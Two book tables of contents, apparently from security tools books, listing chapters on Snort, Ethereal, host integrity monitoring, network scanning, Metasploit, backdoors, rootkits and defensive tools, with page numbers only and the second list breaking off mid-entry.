XML::Simple . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 135
332_NSE_TOC.qxd 7/18/05 11:51 AM Page xv
xvi Contents
Tool Usage. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 136
The Source . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 138
Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .146
Final Touches . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .147
Part II Snort Tools. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 149
Chapter 7 The Inner Workings of Snort . . . . . . . . . . . 151
In This Toolbox . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .152
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 152
Initialization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 154
Starting Up . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .154
Libpcap . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 158
Parsing the Configuration File . . . . . . . . . . . . . . . . . . .159
ParsePreprocessor() . . . . . . . . . . . . . . . . . . . . . . . . . 160
ParseOutputPlugin() . . . . . . . . . . . . . . . . . . . . . . . . 161
Snort Rules . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 162
Event Queue Initialization . . . . . . . . . . . . . . . . . . . 168
Final Initialization. . . . . . . . . . . . . . . . . . . . . . . . . . 168
Decoding . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 168
Preprocessing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 172
Detection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 174
Content Matching . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 175
The Stream4 Preprocessor . . . . . . . . . . . . . . . . . . . . . . . . . 176
Inline Functionality. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 176
Inline Initialization . . . . . . . . . . . . . . . . . . . . . . . . . 176
Inline Detection . . . . . . . . . . . . . . . . . . . . . . . . . . . 178
Final Touches . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 179
Chapter 8 Snort Rules . . . . . . . . . . . . . . . . . . . . . . . . . 181
In This Toolbox . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .182
Writing Basic Rules . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 182
The Rule Header . . . . . . . . . . . . . . . . . . . . . . . . . . . .182
Rule Options . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .184
Metadata Options . . . . . . . . . . . . . . . . . . . . . . . . . . . .185
sid . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 185
rev . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 185
msg . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 185
332_NSE_TOC.qxd 7/18/05 11:51 AM Page xvi
Contents xvii
reference . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 186
classtype . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 186
priority . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 188
Payload Options . . . . . . . . . . . . . . . . . . . . . . . . . . . . .188
content . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 188
offset . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 188
depth . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 189
distance . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 189
within . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 189
nocase . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 190
rawbytes. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 190
uricontent . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 190
isdataat . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 190
Nonpayload Options . . . . . . . . . . . . . . . . . . . . . . . . . .190
flags . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 190
fragoffset . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 191
fragbits . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 191
ip_proto . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 192
ttl. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 192
tos . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 192
id. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 192
ipopts. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 192
ack. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 193
seq . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 193
dsize. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 193
window . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 193
itype . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 193
icode . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 193
icmp_id . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 193
icmp_seq . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 194
rpc . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 194
sameip . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 194
Post-detection Options . . . . . . . . . . . . . . . . . . . . . . . .194
resp . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 194
react. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 195
logto . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 195
332_NSE_TOC.qxd 7/18/05 11:51 AM Page xvii
xviii Contents
session . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 195
tag . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 196
Writing Advanced Rules . . . . . . . . . . . . . . . . . . . . . . . . . 196
PCRE . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .196
Byte_test and Byte_jump . . . . . . . . . . . . . . . . . . . . . . .205
byte_test. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 205
byte_jump . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 206
The Flow Options . . . . . . . . . . . . . . . . . . . . . . . . . . . .209
flow . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 209
flowbits . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 210
Activate and Dynamic Rules . . . . . . . . . . . . . . . . . . . .211
Optimizing Rules . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 211
Ordering Detection Options . . . . . . . . . . . . . . . . . . . .211
Choosing between Content and PCRE . . . . . . . . . . . .212
Merging CIDR Subnets . . . . . . . . . . . . . . . . . . . . . . .212
Optimizing Regular Expressions . . . . . . . . . . . . . . . . .213
Testing Rules . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 217
Final Touches . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 219
Chapter 9 Plugins and Preprocessors . . . . . . . . . . . . . 221
In This Toolbox . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .222
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 222
Writing Detection Plugins . . . . . . . . . . . . . . . . . . . . . . . . 222
RFC 3514:The Evil Bit . . . . . . . . . . . . . . . . . . . . . . .223
Detecting "Evil" Packets . . . . . . . . . . . . . . . . . . . . . . .224
SetupEvilBit() . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .225
EvilBitInit() . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .226
ParseEvilBit() . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .227
CheckEvilBit() . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .228
Setting Up . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .229
Testing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .230
Writing Preprocessors . . . . . . . . . . . . . . . . . . . . . . . . . . . . 232
IP-ID Tricks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .233
Idle Scanning . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .233
Predictable IP-ID Preprocessor . . . . . . . . . . . . . . . . . . .235
SetupIPID() . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .236
IPIDInit() . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .236
332_NSE_TOC.qxd 7/18/05 11:51 AM Page xviii
Contents xix
IPIDParse() . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .237
RecordIPID() . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .238
Setting Up . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .241
Prevention . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .242
Writing Output Plugins . . . . . . . . . . . . . . . . . . . . . . . . . . 242
GTK+ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .243
An Interface for Snort . . . . . . . . . . . . . . . . . . . . . . . . .244
Glade . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .244
Function Layout . . . . . . . . . . . . . . . . . . . . . . . . . . . . .248
AlertGTKSetup() . . . . . . . . . . . . . . . . . . . . . . . . . . . .249
AlertGTKInit . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .249
AlertGTK . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .251
Exiting . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .251
Setting Up . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .253
Miscellaneous . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .254
Final Touches . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 254
Chapter 10 Modifying Snort . . . . . . . . . . . . . . . . . . . . 255
In This Toolbox . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .256
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 256
Snort-AV . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 256
Active Verification . . . . . . . . . . . . . . . . . . . . . . . . . . . .256
Snort-AV- Implementation Summary . . . . . . . . . . . . . .257
Snort-AV Initilization . . . . . . . . . . . . . . . . . . . . . . . . .258
Snort.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 258
Snort.c. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 259
Parser.c. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 260
Signature.h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 261
Detect.c . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 261
Snort-AV Event Generation . . . . . . . . . . . . . . . . . . . . .264
Snort-AV Event Verification . . . . . . . . . . . . . . . . . . . .266
Setting Up . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .269
Snort-Wireless . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 269
Implementation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .270
Preprocessors . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .272
Anti-Stumbler . . . . . . . . . . . . . . . . . . . . . . . . . . . . 272
Auth Flood . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 272
332_NSE_TOC.qxd 7/18/05 11:51 AM Page xix
xx Contents
De-auth Flood . . . . . . . . . . . . . . . . . . . . . . . . . . . . 272
Mac-Spoof . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 272
Rogue-AP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 273
Detection Plugins . . . . . . . . . . . . . . . . . . . . . . . . . . . .273
Wifi Addr4. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 274
BSSID . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 274
Duration ID . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 274
Fragnum . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 274
Frame Control . . . . . . . . . . . . . . . . . . . . . . . . . . . . 274
From DS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 274
More Data . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 274
More Frags. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 275
Order. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 275
Power Management . . . . . . . . . . . . . . . . . . . . . . . . 275
Retry. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 275
Seg Number. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 275
SSID . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 275
Stype . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 275
To DS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 276
Type . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 276
WEP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 276
Rules . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .276
Final Touches . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 276
Part III Ethereal Tools . . . . . . . . . . . . . . . . . . . . . . . . . . 277
Chapter 11 Capture File Formats. . . . . . . . . . . . . . . . . 279
In This Toolbox . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .280
Using libpcap . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 280
Selecting an Interface . . . . . . . . . . . . . . . . . . . . . . . . .280
Opening the Interface . . . . . . . . . . . . . . . . . . . . . . . . .283
Capturing Packets . . . . . . . . . . . . . . . . . . . . . . . . . . . .284
Saving Packets to a File . . . . . . . . . . . . . . . . . . . . . . . .287
Using text2pcap . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 289
text2pcap Hex Dumps . . . . . . . . . . . . . . . . . . . . . . . . .289
Packet Metadata . . . . . . . . . . . . . . . . . . . . . . . . . . . . .290
Converting Other Hex Dump Formats . . . . . . . . . . . .292
Extending Wiretap . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 295
332_NSE_TOC.qxd 7/18/05 11:51 AM Page xx
Contents xxi
The Wiretap Library . . . . . . . . . . . . . . . . . . . . . . . . . .295
Reverse Engineering a Capture File Format . . . . . . . . .296
Understanding Capture File Formats . . . . . . . . . . . . 296
Finding Packets in the File . . . . . . . . . . . . . . . . . . . 298
Adding a Wiretap Module . . . . . . . . . . . . . . . . . . . . . .308
The module_open Function . . . . . . . . . . . . . . . . . . 308
The module_read Function. . . . . . . . . . . . . . . . . . . 312
The module_seek_read Function. . . . . . . . . . . . . . . 318
The module_close Function . . . . . . . . . . . . . . . . . . 322
Building Your Module. . . . . . . . . . . . . . . . . . . . . . . 322
Final Touches . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 322
Chapter 12 Protocol Dissectors . . . . . . . . . . . . . . . . . . 323
In This Toolbox . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .324
Setting up a New Dissector. . . . . . . . . . . . . . . . . . . . . . . . 324
Built-in versus Plugin . . . . . . . . . . . . . . . . . . . . . . . . .324
Calling Your Dissector . . . . . . . . . . . . . . . . . . . . . . . . .330
Calling a Dissector Directly. . . . . . . . . . . . . . . . . . . 331
Using a Lookup Table . . . . . . . . . . . . . . . . . . . . . . . 332
Examining Packet Data as a Last Resort. . . . . . . . . . 333
New Link Layer Protocol . . . . . . . . . . . . . . . . . . . . 334
Defining the Protocol . . . . . . . . . . . . . . . . . . . . . . . . .334
Programming the Dissector . . . . . . . . . . . . . . . . . . . . . . . . 340
Low-Level Data Structures . . . . . . . . . . . . . . . . . . . . . .340
Adding Column Data . . . . . . . . . . . . . . . . . . . . . . . . .343
Creating proto_tree Data . . . . . . . . . . . . . . . . . . . . . . .345
Calling the Next Protocol . . . . . . . . . . . . . . . . . . . . . .349
Advanced Dissector Concepts . . . . . . . . . . . . . . . . . . . . . . 350
Exceptions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .350
User Preferences . . . . . . . . . . . . . . . . . . . . . . . . . . . . .352
Final Touches . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 356
332_NSE_TOC.qxd 7/18/05 11:51 AM Page xxi
xxii Contents
Chapter 13 Reporting from Ethereal. . . . . . . . . . . . . . 357
In This Toolbox. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 358
Writing Line-Mode Tap Modules . . . . . . . . . . . . . . . . . . . 358
Adding a Tap to a Dissector . . . . . . . . . . . . . . . . . . . . .358
Adding a Tap Module . . . . . . . . . . . . . . . . . . . . . . . . .361
tap_reset. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 366
tap_packet . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 367
tap_draw . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 370
Writing GUI Tap Modules . . . . . . . . . . . . . . . . . . . . . . . . 371
Initializer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .374
The Three Tap Callbacks . . . . . . . . . . . . . . . . . . . . . . .377
Processing Tethereal's Output. . . . . . . . . . . . . . . . . . . . . . . 380
XML/PDML . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 388
The PDML Format . . . . . . . . . . . . . . . . . . . . . . . . . . .390
Metadata Protocols . . . . . . . . . . . . . . . . . . . . . . . . . . .393
EtherealXML.py . . . . . . . . . . . . . . . . . . . . . . . . . . . . .395
Final Touches . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 400
Appendix A Host Integrity Monitoring
Using Osiris and Samhain . . . . . . . . . . . . . . . . . . . . . . 401
Introducing Host Integrity Monitoring . . . . . . . . . . . . . . . 402
How Do HIM Systems Work? . . . . . . . . . . . . . . . . . . .403
Scanning the Environment . . . . . . . . . . . . . . . . . . . 403
Centralized Management . . . . . . . . . . . . . . . . . . . . 405
Feedback . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 406
Introducing Osiris and Samhain. . . . . . . . . . . . . . . . . . . . . 406
Osiris . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 407
How Osiris Works . . . . . . . . . . . . . . . . . . . . . . . . . . . .407
Authentication of Components . . . . . . . . . . . . . . . . 408
Scan Data. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 409
Logging . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 410
Filtering Noise . . . . . . . . . . . . . . . . . . . . . . . . . . . . 411
Notifications. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 411
Strengths . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .412
Weaknesses . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .412
Samhain . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 413
How Samhain Works . . . . . . . . . . . . . . . . . . . . . . . . . .413
332_NSE_TOC.qxd 7/18/05 11:51 AM Page xxii
Contents xxiii
Authentication of Components . . . . . . . . . . . . . . . . 415
Scan Data. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 415
Logging . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 415
Notifications. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 416
Strengths . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .417
Weaknesses . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .417
Extending Osiris and Samhain with Modules. . . . . . . . . . . 418
Osiris Modules . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 418
An Example Module: mod_hostname . . . . . . . . . . . . . .419
Testing Your Module . . . . . . . . . . . . . . . . . . . . . . . . . .421
Packaging Your Module . . . . . . . . . . . . . . . . . . . . . . . .423
General Considerations . . . . . . . . . . . . . . . . . . . . . . . .423
Samhain Modules . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 423
An Example Module: hostname . . . . . . . . . . . . . . . . . .424
Testing Your Module . . . . . . . . . . . . . . . . . . . . . . . . . .430
Packaging Your Module . . . . . . . . . . . . . . . . . . . . . . . .431
Index. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 433
Table of Contents
Foreword
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
xiii
Credits
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
xvii
Preface
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
xxi
Part I
Legal and Ethics
1. Legal and Ethics Issues
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
3
1.1
Core Issues 4
1.2
Computer Trespass Laws: No "Hacking" Allowed 7
1.3
Reverse Engineering 13
1.4
Vulnerability Reporting 22
1.5
What to Do from Now On 26
Part II
Reconnaissance
2. Network Scanning
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
31
2.1
How Scanners Work 31
2.2
Superuser Privileges 33
2.3
Three Network Scanners to Consider 34
2.4
Host Discovery 34
2.5
Port Scanning 37
2.6
Specifying Custom Ports 39
2.7
Specifying Targets to Scan 40
2.8
Different Scan Types 42
vi Table of Contents
2.9
Tuning the Scan Speed 45
2.10
Application Fingerprinting 49
2.11
Operating System Detection 49
2.12
Saving Nmap Output 51
2.13
Resuming Nmap Scans 51
2.14
Avoiding Detection 52
2.15
Conclusion 54
3. Vulnerability Scanning
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
55
3.1
Nessus 55
3.2
Nikto 72
3.3
WebInspect 76
4. LAN Reconnaissance
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
86
4.1
Mapping the LAN 87
4.2
Using ettercap and arpspoof on a Switched Network 88
4.3
Dealing with Static ARP Tables 92
4.4
Getting Information from the LAN 94
4.5
Manipulating Packet Data 98
5. Wireless Reconnaissance
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
101
5.1
Get the Right Wardriving Gear 101
5.2
802.11 Network Basics 102
5.3
802.11 Frames 103
5.4
How Wireless Discovery Tools Work 105
5.5
Netstumbler 105
5.6
Kismet at a Glance 107
5.7
Using Kismet 110
5.8
Sorting the Kismet Network List 112
5.9
Using Network Groups with Kismet 112
5.10
Using Kismet to Find Networks by Probe Requests 113
5.11
Kismet GPS Support Using gpsd 113
5.12
Looking Closer at Traffic with Kismet 114
5.13
Capturing Packets and Decrypting Traffic with Kismet 116
5.14
Wireshark at a Glance 117
5.15
Using Wireshark 119
5.16
AirDefense Mobile 122
5.17
AirMagnet Analyzers 126
5.18
Other Wardriving Tools 129
Table of Contents vii
6. Custom Packet Generation
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
130
6.1
Why Create Custom Packets? 130
6.2
Hping 132
6.3
Scapy 136
6.4
Packet-Crafting Examples with Scapy 163
6.5
Packet Mangling with Netfilter 183
6.6
References 189
Part III
Penetration
7. Metasploit
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
193
7.1
Metasploit Interfaces 194
7.2
Updating Metasploit 200
7.3
Choosing an Exploit 200
7.4
Choosing a Payload 202
7.5
Setting Options 206
7.6
Running an Exploit 209
7.7
Managing Sessions and Jobs 212
7.8
The Meterpreter 215
7.9
Security Device Evasion 219
7.10
Sample Evasion Output 220
7.11
Evasion Using NOPs and Encoders 221
7.12
In Conclusion 224
8. Wireless Penetration
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
225
8.1
WEP and WPA Encryption 225
8.2
Aircrack 226
8.3
Installing Aircrack-ng 227
8.4
Running Aircrack-ng 229
8.5
Airpwn 231
8.6
Basic Airpwn Usage 231
8.7
Airpwn Configuration Files 235
8.8
Using Airpwn on WEP-Encrypted Networks 236
8.9
Scripting with Airpwn 237
8.10
Karma 238
8.11
Conclusion 241
viii Table of Contents
9. Exploitation Framework Applications
. . . . . . . . . . . . . . . . . . . . . . . . .
242
9.1
Task Overview 242
9.2
Core Impact Overview 244
9.3
Network Reconnaissance with Core Impact 246
9.4
Core Impact Exploit Search Engine 247
9.5
Running an Exploit 249
9.6
Running Macros 250
9.7
Bouncing Off an Installed Agent 253
9.8
Enabling an Agent to Survive a Reboot 253
9.9
Mass Scale Exploitation 254
9.10
Writing Modules for Core Impact 255
9.11
The Canvas Exploit Framework 258
9.12
Porting Exploits Within Canvas 260
9.13
Using Canvas from the Command Line 261
9.14
Digging Deeper with Canvas 262
9.15
Advanced Exploitation with MOSDEF 262
9.16
Writing Exploits for Canvas 264
9.17
Exploiting Alternative Tools 267
10. Custom Exploitation
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
268
10.1
Understanding Vulnerabilities 269
10.2
Analyzing Shellcode 275
10.3
Testing Shellcode 279
10.4
Creating Shellcode 285
10.5
Disguising Shellcode 302
10.6
Execution Flow Hijacking 306
10.7
References 320
Part IV
Control
11. Backdoors
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
323
11.1
Choosing a Backdoor 324
11.2
VNC 325
11.3
Creating and Packaging a VNC Backdoor 327
11.4
Connecting to and Removing the VNC Backdoor 332
11.5
Back Orifice 2000 334
11.6
Configuring a BO2k Server 335
11.7
Configuring a BO2k Client 340
Table of Contents ix
11.8
Adding New Servers to the BO2k Workspace 342
11.9
Using the BO2k Backdoor 343
11.10
BO2k Powertools 345
11.11
Encryption for BO2k Communications 355
11.12
Concealing the BO2k Protocol 356
11.13
Removing BO2k 358
11.14
A Few Unix Backdoors 359
12. Rootkits
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
363
12.1
Windows Rootkit: Hacker Defender 363
12.2
Linux Rootkit: Adore-ng 366
12.3
Detecting Rootkits Techniques 368
12.4
Windows Rootkit Detectors 371
12.5
Linux Rootkit Detectors 376
12.6
Cleaning an Infected System 380
12.7
The Future of Rootkits 381
Part V
Defense
13. Proactive Defense: Firewalls
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
385
13.1
Firewall Basics 385
13.2
Network Address Translation 389
13.3
Securing BSD Systems with ipfw/natd 391
13.4
Securing GNU/Linux Systems with netfilter/iptables 401
13.5
Securing Windows Systems with Windows Firewall/Internet
Connection Sharing 412
13.6
Verifying Your Coverage 417
14. Host Hardening
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
421
14.1
Controlling Services 422
14.2
Turning Off What You Do Not Need 423
14.3
Limiting Access 424
14.4
Limiting Damage 430
14.5
Bastille Linux 436
14.6
SELinux 438
14.7
Password Cracking 444
14.8
Chrooting 448
14.9
Sandboxing with OS Virtualization 449
x Table of Contents
15. Securing Communications
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
455
15.1
The SSH-2 Protocol 456
15.2
SSH Configuration 459
15.3
SSH Authentication 465
15.4
SSH Shortcomings 471
15.5
SSH Troubleshooting 476
15.6
Remote File Access with SSH 480
15.7
SSH Advanced Use 483
15.8
Using SSH Under Windows 489
15.9
File and Email Signing and Encryption 494
15.10
GPG 495
15.11
Create Your GPG Keys 499
15.12
Encryption and Signature with GPG 507
15.13
PGP Versus GPG Compatibility 509
15.14
Encryption and Signature with S/MIME 510
15.15
Stunnel 513
15.16
Disk Encryption 520
15.17
Windows Filesystem Encryption with PGP Disk 521
15.18
Linux Filesystem Encryption with LUKS 522
15.19
Conclusion 524
16. Email Security and Anti-Spam
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
525
16.1
Norton Antivirus 527
16.2
The ClamAV Project 531
16.3
ClamWin 531
16.4
Freshclam 533
16.5
Clamscan 536
16.6
clamd and clamdscan 538
16.7
ClamAV Virus Signatures 544
16.8
Procmail 548
16.9
Basic Procmail Rules 550
16.10
Advanced Procmail Rules 552
16.11
ClamAV with Procmail 554
16.12
Unsolicited Email 554
16.13
Spam Filtering with Bayesian Filters 556
16.14
SpamAssassin 560
16.15
SpamAssassin Rules 562
16.16
Plug-ins for SpamAssassin 567
16.17
SpamAssassin with Procmail 569
Table of Contents xi
16.18
Anti-Phishing Tools 571
16.19
Conclusion 574
17. Device Security Testing
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
576
17.1
Replay Traffic with Tcpreplay 577
17.2
Traffic IQ Pro 586
17.3
ISIC Suite 593
17.4
Protos 601
Part VI
Monitoring
18. Network Capture
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
607
18.1
tcpdump 607
18.2
Ethereal/Wireshark 614
18.3
pcap Utilities: tcpflow and Netdude 631
18.4
Python/Scapy Script Fixes Checksums 638
18.5
Conclusion 639
19. Network Monitoring
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
640
19.1
Snort 640
19.2
Implementing Snort 651
19.3
Honeypot Monitoring 653
19.4
Gluing the Stuff Together 662
20. Host Monitoring
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
664
20.1
Using File Integrity Checkers 664
20.2
File Integrity Hashing 666
20.3
The Do-It-Yourself Way with rpmverify 668
20.4
Comparing File Integrity Checkers 670
20.5
Prepping the Environment for Samhain and Tripwire 673
20.6
